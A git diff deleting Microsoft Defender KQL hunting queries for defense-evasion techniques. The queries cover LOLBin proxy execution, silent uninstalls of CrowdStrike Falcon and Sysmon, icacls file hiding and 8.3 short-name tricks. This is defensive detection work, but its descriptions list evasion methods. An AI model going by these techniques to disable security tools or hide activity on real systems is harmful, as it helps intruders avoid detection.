-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index 77dfd04d..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
deleted file mode 100644
index 43fcebb7..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql
deleted file mode 100644
index 0ea3864c..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh @cyb3rjy0t
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\odbcconf.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql
deleted file mode 100644
index 3f6b0cac..00000000
--- a/Defense Evasion/Uncommon_Extension_In_Keyboard_Layout_IME_File_Registry_Value.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/21
-// Level: high
-// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
-Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
-IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql b/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql
deleted file mode 100644
index 44d89cab..00000000
--- a/Defense Evasion/Uncommon_FileSystem_Load_Attempt_By_Format.com.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: high
-// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql b/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql
deleted file mode 100644
index 141841a4..00000000
--- a/Defense Evasion/Uncommon_File_Creation_By_Mysql_Daemon_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: high
-// Description: Detects the creation of files with scripting or executable extensions by Mysql daemon.
-Which could be an indicator of "User Defined Functions" abuse to download malware.
-
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\mysqld.exe" or InitiatingProcessFolderPath endswith "\\mysqld-nt.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql b/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql
deleted file mode 100644
index 167db3f4..00000000
--- a/Defense Evasion/Uncommon_Microsoft_Office_Trusted_Location_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql b/Defense Evasion/Uncommon_Svchost_Parent_Process.kql
deleted file mode 100644
index 34b8d2cc..00000000
--- a/Defense Evasion/Uncommon_Svchost_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/08/15
-// Level: medium
-// Description: Detects an uncommon svchost parent process
-// Tags: attack.defense_evasion, attack.t1036.005
-DeviceProcessEvents
-| where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql b/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql
deleted file mode 100644
index ca6bca6f..00000000
--- a/Defense Evasion/Uncommon__Assistive_Technology_Applications_Execution_Via_AtBroker.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Mateusz Wydra, oscd.community
-// Date: 2020/10/12
-// Level: medium
-// Description: Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "start" and (FolderPath endswith "\\AtBroker.exe" or ProcessVersionInfoOriginalFileName =~ "AtBroker.exe")) and (not((ProcessCommandLine contains "animations" or ProcessCommandLine contains "audiodescription" or ProcessCommandLine contains "caretbrowsing" or ProcessCommandLine contains "caretwidth" or ProcessCommandLine contains "colorfiltering" or ProcessCommandLine contains "cursorindicator" or ProcessCommandLine contains "cursorscheme" or ProcessCommandLine contains "filterkeys" or ProcessCommandLine contains "focusborderheight" or ProcessCommandLine contains "focusborderwidth" or ProcessCommandLine contains "highcontrast" or ProcessCommandLine contains "keyboardcues" or ProcessCommandLine contains "keyboardpref" or ProcessCommandLine contains "livecaptions" or ProcessCommandLine contains "magnifierpane" or ProcessCommandLine contains "messageduration" or ProcessCommandLine contains "minimumhitradius" or ProcessCommandLine contains "mousekeys" or ProcessCommandLine contains "Narrator" or ProcessCommandLine contains "osk" or ProcessCommandLine contains "overlappedcontent" or ProcessCommandLine contains "showsounds" or ProcessCommandLine contains "soundsentry" or ProcessCommandLine contains "speechreco" or ProcessCommandLine contains "stickykeys" or ProcessCommandLine contains "togglekeys" or ProcessCommandLine contains "voiceaccess" or ProcessCommandLine contains "windowarranging" or ProcessCommandLine contains "windowtracking" or ProcessCommandLine contains "windowtrackingtimeout" or ProcessCommandLine contains "windowtrackingzorder"))) and (not(ProcessCommandLine contains "Oracle_JavaAccessBridge"))
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql b/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql
deleted file mode 100644
index 996ee87c..00000000
--- a/Defense Evasion/Uninstall_Crowdstrike_Falcon_Sensor.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet"
\ No newline at end of file
diff --git a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql b/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql
deleted file mode 100644
index 7d3b2fa9..00000000
--- a/Defense Evasion/Uninstall_Sysinternals_Sysmon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/12
-// Level: high
-// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql b/Defense Evasion/Unmount_Share_Via_Net.EXE.kql
deleted file mode 100644
index db69455f..00000000
--- a/Defense Evasion/Unmount_Share_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, @redcanary, Zach Stanford @svch0st
-// Date: 2020/10/08
-// Level: low
-// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Defense Evasion/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql b/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql
deleted file mode 100644
index a0050001..00000000
--- a/Defense Evasion/Use_Icacls_to_Hide_File_to_Everyone.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/18
-// Level: medium
-// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql
deleted file mode 100644
index 5cf32ab1..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql b/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql
deleted file mode 100644
index cea6c506..00000000
--- a/Defense Evasion/Use_NTFS_Short_Name_in_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/06
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
deleted file mode 100644
index 827d695b..00000000
--- a/Defense Evasion/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql b/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql
deleted file mode 100644
index 23a837f9..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe", "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veam.backup.shell.exe" or InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe") or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\" or (ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe" or ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_Short_Name_Path_in_Image.kql b/Defense Evasion/Use_Short_Name_Path_in_Image.kql
deleted file mode 100644
index 0ff162d4..00000000
--- a/Defense Evasion/Use_Short_Name_Path_in_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/07
-// Level: medium
-// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Remote.exe.kql b/Defense Evasion/Use_of_Remote.exe.kql
deleted file mode 100644
index 58ed2620..00000000
--- a/Defense Evasion/Use_of_Remote.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/02
-// Level: medium
-// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Scriptrunner.exe.kql b/Defense Evasion/Use_of_Scriptrunner.exe.kql
deleted file mode 100644
index 0c832c20..00000000
--- a/Defense Evasion/Use_of_Scriptrunner.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Setres.exe.kql b/Defense Evasion/Use_of_Setres.exe.kql
deleted file mode 100644
index 8d88bcb7..00000000
--- a/Defense Evasion/Use_of_Setres.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/12/11
-// Level: medium
-// Description: Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named "choice" (with any executable extension such as ".cmd" or ".exe") from the current execution path
-// Tags: attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where FolderPath endswith "\\choice" and InitiatingProcessFolderPath endswith "\\setres.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_TTDInject.exe.kql b/Defense Evasion/Use_of_TTDInject.exe.kql
deleted file mode 100644
index c40854dd..00000000
--- a/Defense Evasion/Use_of_TTDInject.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql b/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql
deleted file mode 100644
index a392ba2f..00000000
--- a/Defense Evasion/Use_of_VSIISExeLauncher.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: medium
-// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql b/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql
deleted file mode 100644
index 3179a894..00000000
--- a/Defense Evasion/Use_of_VisualUiaVerifyNative.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Use_of_Wfc.exe.kql b/Defense Evasion/Use_of_Wfc.exe.kql
deleted file mode 100644
index b0bfabe4..00000000
--- a/Defense Evasion/Use_of_Wfc.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022/06/01
-// Level: medium
-// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql b/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql
deleted file mode 100644
index a0582a37..00000000
--- a/Defense Evasion/Using_SettingSyncHost.exe_as_LOLBin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anton Kutepov, oscd.community
-// Date: 2020/02/05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1574.008
-DeviceProcessEvents
-| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql b/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql
deleted file mode 100644
index 7ffb6536..00000000
--- a/Defense Evasion/UtilityFunctions.ps1_Proxy_Dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/28
-// Level: medium
-// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin "
\ No newline at end of file
diff --git a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql b/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql
deleted file mode 100644
index df845624..00000000
--- a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects when verclsid.exe is used to run COM object via GUID
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql b/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql
deleted file mode 100644
index cd684dd2..00000000
--- a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/07
-// Level: high
-// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
deleted file mode 100644
index 76373e3d..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
deleted file mode 100644
index 275a6408..00000000
--- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
